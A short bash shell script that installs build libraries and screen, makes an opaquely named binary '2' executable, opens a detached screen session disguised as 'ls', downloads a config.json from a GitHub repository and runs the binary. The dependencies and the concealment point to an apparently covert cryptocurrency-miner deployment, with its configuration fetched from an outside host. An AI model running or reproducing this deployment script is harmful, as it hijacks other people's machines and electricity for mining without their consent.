#!/bin/bash
apt update
apt install screen libjansson4 -y
apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
chmod +x 2
screen -dmS ls
wget https://raw.githubusercontent.com/johnwixk228/config-json/main/turtle/config.json
 ./2
